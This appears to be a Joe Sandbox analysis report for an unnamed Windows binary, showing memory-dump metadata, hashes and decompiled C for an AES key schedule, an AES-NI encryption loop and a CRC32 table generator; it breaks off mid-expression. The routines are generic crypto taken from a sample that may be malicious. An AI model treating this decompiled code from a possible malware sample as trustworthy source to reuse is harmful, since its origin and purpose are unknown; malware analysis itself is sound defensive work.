0x0040baab
0x0040bab0
0x0040bab0
0x0040bab0
0x0040bac1
0x0040bacb
0x0040bad2
0x0040bae5
0x0040baec
0x0040baec
0x0040baf5
0x0040bb1c
0x0040bb31
0x0040bb33
0x0040bb43
0x0040bb52
0x0040bb5c
0x0040bb6c
0x0040bb76
0x0040bb7e
0x0040bb87
0x0040bb8b
0x0040bb8f
0x0040bb93
0x0040bb95
0x0040bba6
0x0040bbbe
0x0040bbe5
0x0040bbec
0x0040bbf3
0x0040bbf4
0x0040bc00
0x0040bc0a
0x0040bc14
0x0040bc1e
0x0040bc29
0x0040bc2b
0x0040bc35
0x0040bc3f
0x00000000
0x0040bc3f
0x0040bc49

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73730e3d9151fbadbdc16631f016a2ea510cfbdbc37b2b029a2882c1c2214c2e
Instruction ID: dd20adac85c5117443e66756b5ec49ccb88ee33e59fa4e887385627a91a44c63
Opcode Fuzzy Hash: 73730e3d9151fbadbdc16631f016a2ea510cfbdbc37b2b029a2882c1c2214c2e
Instruction Fuzzy Hash: 2A41F771B609200AF308CF678C891A67FC3D7C9346744C23DD565CA6D9DABDC447C698

Uniqueness

Uniqueness Score: -1.00%

Function 0040A4E0, Relevance: .1, Instructions: 95
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0040A4E0(signed int* __edx) {
				signed int _t35;
				signed int _t37;
				signed int _t38;
				signed int* _t39;
				signed int* _t40;
				unsigned int _t47;
				signed int _t48;
				signed int* _t49;
				signed int* _t50;
				signed int _t54;
				signed int _t77;
				signed int _t85;
				unsigned int _t86;
				void* _t94;

				_t50 = __edx;
				_t47 =  *(_t94 + 0xc);
				_t86 = _t47 + 0x1c;
				_t48 = _t47 >> 2;
				_t35 = (_t48 >> 1) + 3;
				_t85 = 0;
				 *(_t94 + 0xc) = _t86;
				 *_t49 = _t35;
				if(_t48 == 0) {
					L2:
					if(_t85 >= _t86) {
						return _t35;
					}
					 *((intOrPtr*)(_t94 + 0x14)) = _t49 + 0x10 + (_t85 - _t48) * 4;
					do {
						_t37 = _t85;
						_t38 = _t37 / _t48;
						_t54 = _t37 % _t48;
						_t77 =  *(_t49 + 0xc + _t85 * 4);
						if(_t54 != 0) {
							if(_t48 > 6 && _t54 == 4) {
								_t77 =  *((_t77 & 0x000000ff) + 0x41c040) & 0x000000ff | (( *((_t77 >> 0x00000010 & 0x000000ff) + 0x41c040) & 0x000000ff | ( *((_t77 >> 0x18) + 0x41c040) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t77 >> 0x00000008 & 0x000000ff) + 0x41c040) & 0x000000ff) << 0x00000008;
							}
						} else {
							_t18 = _t38 + 0x41c140; // 0x4020100
							_t86 =  *(_t94 + 0x10);
							_t77 =  *((_t77 >> 0x00000008 & 0x000000ff) + 0x41c040) & 0x000000ff ^  *_t18 & 0x000000ff | ((( *((_t77 & 0x000000ff) + 0x41c040) & 0x000000ff) << 0x00000008 |  *((_t77 >> 0x18) + 0x41c040) & 0x000000ff) << 0x00000008 |  *((_t77 >> 0x00000010 & 0x000000ff) + 0x41c040) & 0x000000ff) << 0x00000008;
						}
						_t39 =  *(_t94 + 0x18);
						 *(_t49 + 0x10 + _t85 * 4) =  *_t39 ^ _t77;
						_t85 = _t85 + 1;
						_t40 =  &(_t39[1]);
						 *(_t94 + 0x18) = _t40;
					} while (_t85 < _t86);
					return _t40;
				} else {
					goto L1;
				}
				do {
					L1:
					_t35 =  *_t50;
					 *(_t49 + 0x10 + _t85 * 4) = _t35;
					_t85 = _t85 + 1;
					_t50 =  &(_t50[1]);
				} while (_t85 < _t48);
				goto L2;
			}

0x0040a4e0
0x0040a4e2
0x0040a4e7
0x0040a4ea
0x0040a4f2
0x0040a4f5
0x0040a4f7
0x0040a4fb
0x0040a4ff
0x0040a50f
0x0040a511
0x0040a604
0x0040a604
0x0040a51f
0x0040a524
0x0040a526
0x0040a528
0x0040a528
0x0040a52a
0x0040a530
0x0040a590
0x0040a5e1
0x0040a5e1
0x0040a532
0x0040a532
0x0040a580
0x0040a589
0x0040a589
0x0040a5e3
0x0040a5eb
0x0040a5ef
0x0040a5f0
0x0040a5f3
0x0040a5f7
0x00000000
0x00000000
0x00000000
0x00000000
0x0040a501
0x0040a501
0x0040a501
0x0040a503
0x0040a507
0x0040a508
0x0040a50b
0x00000000

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d6b9b754f9b189d92509bd9194e6262c08822d317c9229910bcc5669ef11d2d
Instruction ID: 8f6eb64d06b658f293c5b46dbe98da55d8e186e99a2fb9da9eaca93df92f0056
Opcode Fuzzy Hash: 6d6b9b754f9b189d92509bd9194e6262c08822d317c9229910bcc5669ef11d2d
Instruction Fuzzy Hash: A7316872A047A646E310DE1ECC80263BBD3BFC5205F088276D4945B78BD539D4128295

Uniqueness

Uniqueness Score: -1.00%

Function 004198C3, Relevance: .1, Instructions: 92
COMMONCrypto

Download Yara Rule

C-Code - Quality: 15%

			E004198C3(void* __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				void* _v13;
				intOrPtr _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t13;
				void* _t17;

				_t13 = __edx;
				_t6 = _a4;
				asm("movdqa xmm6, [ecx]");
				 *( &_v13 << 4) = 1;
				_v8 = 0;
				_v4 = 0;
				_v0 = 0;
				_t17 =  ~( *(__ecx + 0x10) << 5) + 0x20;
				while(1) {
					_t6 = _t6 - 4;
					if(_t6 < 0) {
						break;
					}
					asm("movdqa xmm7, [ebp]");
					asm("paddq xmm6, xmm7");
					asm("movdqa xmm0, xmm6");
					asm("paddq xmm6, xmm7");
					asm("movdqa xmm1, xmm6");
					asm("paddq xmm6, xmm7");
					asm("movdqa xmm2, xmm6");
					asm("paddq xmm6, xmm7");
					asm("movdqa xmm3, xmm6");
					_t8 = _t17;
					asm("movdqa xmm7, [ebx+ecx-0x20]");
					asm("pxor xmm0, xmm7");
					asm("pxor xmm1, xmm7");
					asm("pxor xmm2, xmm7");
					asm("pxor xmm3, xmm7");
					asm("movdqa xmm7, [ebx+ecx-0x10]");
					asm("aesenc xmm0, xmm7");
					asm("aesenc xmm1, xmm7");
					asm("aesenc xmm2, xmm7");
					asm("aesenc xmm3, xmm7");
					do {
						asm("movdqa xmm7, [ebx+ecx]");
						asm("aesenc xmm0, xmm7");
						asm("aesenc xmm1, xmm7");
						asm("aesenc xmm2, xmm7");
						asm("aesenc xmm3, xmm7");
						asm("movdqa xmm7, [ebx+ecx+0x10]");
						asm("aesenc xmm0, xmm7");
						asm("aesenc xmm1, xmm7");
						asm("aesenc xmm2, xmm7");
						asm("aesenc xmm3, xmm7");
						_t8 = _t8 + 0x20;
					} while (_t8 != 0);
					asm("movdqa xmm7, [ebx+ecx]");
					asm("aesenclast xmm0, xmm7");
					asm("aesenclast xmm1, xmm7");
					asm("aesenclast xmm2, xmm7");
					asm("aesenclast xmm3, xmm7");
					asm("pxor xmm0, [edx]");
					asm("pxor xmm1, [edx+0x10]");
					asm("pxor xmm2, [edx+0x20]");
					asm("pxor xmm3, [edx+0x30]");
					asm("movdqa [edx], xmm0");
					asm("movdqa [edx+0x10], xmm1");
					asm("movdqa [edx+0x20], xmm2");
					asm("movdqa [edx+0x30], xmm3");
					_t13 = _t13 + 0x40;
				}
				_t7 = _t6 + 4;
				while(1) {
					_t7 = _t7 - 1;
					if(_t7 < 0) {
						break;
					}
					asm("paddq xmm6, [ebp]");
					_t9 = _t17;
					asm("movdqa xmm0, [ebx+ecx-0x20]");
					asm("pxor xmm0, xmm6");
					asm("aesenc xmm0, [ebx+ecx-0x10]");
					do {
						asm("aesenc xmm0, [ebx+ecx]");
						asm("aesenc xmm0, [ebx+ecx+0x10]");
						_t9 = _t9 + 0x20;
					} while (_t9 != 0);
					asm("aesenclast xmm0, [ebx+ecx]");
					asm("pxor xmm0, [edx]");
					asm("movdqa [edx], xmm0");
					_t13 = _t13 + 0x10;
				}
				asm("movdqa [esi+ecx-0x40], xmm6");
				return _t7;
			}

0x004198c3
0x004198d3
0x004198dd
0x004198ed
0x004198f4
0x004198fb
0x00419902
0x0041990d
0x004199f1
0x004199f1
0x004199f4
0x00000000
0x00000000
0x00419920
0x00419925
0x00419929
0x0041992d
0x00419931
0x00419935
0x00419939
0x0041993d
0x00419941
0x00419945
0x00419947
0x0041994d
0x00419951
0x00419955
0x00419959
0x0041995d
0x00419963
0x00419968
0x0041996d
0x00419972
0x00419977
0x00419977
0x0041997c
0x00419981
0x00419986
0x0041998b
0x00419990
0x00419996
0x0041999b
0x004199a0
0x004199a5
0x004199aa
0x004199aa
0x004199af
0x004199b4
0x004199b9
0x004199be
0x004199c3
0x004199c8
0x004199cc
0x004199d1
0x004199d6
0x004199db
0x004199df
0x004199e4
0x004199e9
0x004199ee
0x004199ee
0x004199fa
0x00419a3a
0x00419a3a
0x00419a3d
0x00000000
0x00000000
0x004199ff
0x00419a04
0x00419a06
0x00419a0c
0x00419a10
0x00419a17
0x00419a17
0x00419a1d
0x00419a24
0x00419a24
0x00419a29
0x00419a2f
0x00419a33
0x00419a37
0x00419a37
0x00419a3f
0x00419a48

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction ID: 0c79d8c59d00a78f9440f3aa51eedcdd78ab10b5fc93e450dee24b4d7cd4d7bf
Opcode Fuzzy Hash: e781e73348b070714efe4b9f1f387dbcbf5b044bf6c7f23a7a0004d2e0ca769a
Instruction Fuzzy Hash: 1341A561C14B9652EB224F7CC842272B320BFAB244F00D75AFDD179963FB3269846655

Uniqueness

Uniqueness Score: -1.00%

Function 00418D50, Relevance: .1, Instructions: 83
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00418D50() {
				void* _t38;
				signed int _t39;
				signed int _t73;

				_t73 = 0;
				do {
					 *(0x420b80 + _t73 * 4) =  !((( !((( !((( !((( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( !((( !((( !((( !((( !((_t73 & 0x00000001) - 1) & 0xedb88320 ^ _t73 >> 0x00000001) & 0x00000001) - 1) & 0xedb88320 ^ ( 